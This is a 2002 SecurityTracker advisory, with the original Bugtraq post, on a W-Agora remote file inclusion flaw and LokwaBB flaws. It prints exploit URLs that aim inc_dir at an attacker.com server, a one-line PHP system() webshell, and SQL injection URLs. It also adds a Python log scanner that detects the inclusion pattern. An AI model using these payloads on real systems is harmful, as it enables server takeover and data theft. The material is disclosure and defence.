SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   W-Agora
Vendors:   Druilhe, Marc
W-Agora Web Forum Software Lets Remote Users Execute Arbitrary PHP Code on the Server
SecurityTracker Alert ID:  1004494
SecurityTracker URL:  http://securitytracker.com/id/1004494
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 9 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 4.1.3
Description:   Several related vulnerabilities have been reported in the W-Agora web forum software. A remote user can write malicious PHP code and cause it to be executed on the server.

It is reported that several W-Agora components contain an include statement whose file location can be set by the remote user, including to a location on a remote server. A remote user can therefore place a malicious PHP file on a remote server and then call one of the affected components to cause that remote PHP code to be executed on the target web server.

Some demonstration exploit URLs are provided below.

Using a remote PHP file at http://[maliciousserver]/dbaccess.txt:

http://[target]/include/oci8.php?inc_dir=http://[maliciousserver]&ext=txt
http://[target]/include/postgres65.php?inc_dir=http://[maliciousserver]&ext=txt
http://[target]/include/mysql.php?inc_dir=http://[maliciousserver]&ext=txt
http://[target]/include/mssql7.php?inc_dir=http://[maliciousserver]&ext=txt
http://[target]/include/msql.php?inc_dir=http://[maliciousserver]&ext=txt

Using a remote PHP file at http://[maliciousserver]/postgres65.txt:

http://[target]/include/postgres.php?inc_dir=http://[maliciousserver]&ext=txt

Using a remote PHP file at http://[maliciousserver]/auth.txt:

http://[target]/user/agora_user.php?inc_dir=http://[maliciousserver]&ext=txt
http://[target]/user/ldap_example.php?inc_dir=http://[maliciousserver]&ext=txt

For these exploits to work, the remote malicious file must include the following type of content:

<? system($cmd); >

Then, the URL should include '&cmd=[COMMAND]' to cause the 'COMMAND' to be executed by the target server.

The original advisory (in French) is available at:

http://www.ifrance.com/kitetoua/tuto/W-Agora.txt

Impact:   A remote user can execute arbitrary PHP code (including system commands) on the target server. The code will run with the privileges that the web server assigns for PHP code.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.w-agora.net/en/index.php
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any)
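
With no fix available, the request pattern in the demonstration URLs above can be looked for in web server logs. The following check is an added example, not part of this SecurityTracker entry or of W-Agora; the Common Log Format input, the function names and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Script paths named in the advisory (W-Agora 4.1.3).
AFFECTED = {
    "/include/oci8.php", "/include/postgres65.php", "/include/mysql.php",
    "/include/mssql7.php", "/include/msql.php", "/include/postgres.php",
    "/user/agora_user.php", "/user/ldap_example.php",
}
# A value that starts with a URL scheme or a protocol-relative "//" points off-host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:|//)", re.I)
# Request part of a Common Log Format line: "METHOD target HTTP/x.y"
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode(value, rounds=3):
    """Undo repeated percent-encoding so 'http%253A' is still recognised."""
    for _ in range(rounds):
        nxt = unquote(value)
        if nxt == value:
            break
        value = nxt
    return value

def classify(log_line):
    """Return None, or (path, inc_dir value, severity) for a suspicious request."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    target = urlsplit(m.group(1))
    # parse_qsl already decodes one layer; decode() removes any further layers.
    for name, value in parse_qsl(target.query, keep_blank_values=True):
        value = decode(value)
        if name == "inc_dir" and REMOTE.match(value):
            # Suffix match so installs under a sub-directory are covered.
            hit = any(target.path.lower().endswith(p) for p in AFFECTED)
            return (target.path, value, "high" if hit else "review")
    return None

# Constructed sample lines (documentation addresses and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Jun/2002:10:00:01 +0000] "GET /forum/include/mysql.php?inc_dir=http://files.example&ext=txt HTTP/1.0" 200 512',
    '192.0.2.10 - - [09/Jun/2002:10:00:05 +0000] "GET /user/agora_user.php?ext=txt&inc_dir=hTTp%253A%252F%252Ffiles.example HTTP/1.0" 200 87',
    '192.0.2.44 - - [09/Jun/2002:10:01:12 +0000] "GET /index.php?site=demo&inc_dir=include HTTP/1.0" 200 4096',
    '192.0.2.51 - - [09/Jun/2002:10:02:30 +0000] "GET /other/page.php?inc_dir=ftp://files.example/x HTTP/1.0" 404 0',
]

def scan(lines):
    """Return the findings for every line that classify() flags."""
    return [r for r in map(classify, lines) if r]
```

A "high" finding is a remote 'inc_dir' value sent to one of the scripts listed in this entry; "review" is the same parameter pattern on any other path.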

Message History:   None.


 Source Message Contents

Subject:  Security holes in LokwaBB and W-Agora


Somebody advised me to post also on bugtraq not only on vuln-dev, I thus do 
it :)  I just hope that doesn't give more work to the webmasters.

Product 1 :
***********
W-Agora 4.1.3
http://www.w-agora.net

Problem :
- Including file

Exploits :
- With a file http://www.attacker.com/dbaccess.txt :
http://[target]/include/oci8.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/postgres65.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mysql.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/mssql7.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/include/msql.php?inc_dir=http://www.attacker.com&ext=txt

- With a file http://www.attacker.com/postgres65.txt :
http://[target]/include/postgres.php?inc_dir=http://www.attacker.com&ext=txt

- With the file http://www.attacker.com/auth.txt :
http://[target]/user/agora_user.php?inc_dir=http://www.attacker.com&ext=txt
http://[target]/user/ldap_example.php?inc_dir=http://www.attacker.com&ext=txt

More details in French :
http://www.ifrance.com/kitetoua/tuto/W-Agora.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FW-Agora.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools

Product 2 :
***********
LokwaBB 1.2.2
http://lokwa.farcom.com/

Problems :
- XSS
- Private messages reading
- SQL Injection

Exploits :
- http://[target]/member.php?action=viewpro&member='%20OR%20password='PASSWORD
- http://[target]/member.php?action=viewpro&member='%20OR%20status='Administrator
- misc.php?action=forgot&send=yes&loser='%20OR%20password='PASSWORD
- http://[target]/pm.php?action=reply&pmid=[MESSAGE ID]

More details in French :
http://www.ifrance.com/kitetoua/tuto/LokwaBB.txt

Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.ifrance.com%2Fkitetoua%2Ftuto%2FLokwaBB.txt&langpair=fr%7Cen&hl=fr&prev=%2Flanguage_tools



Sorry for my poor English :)
frog-m@n


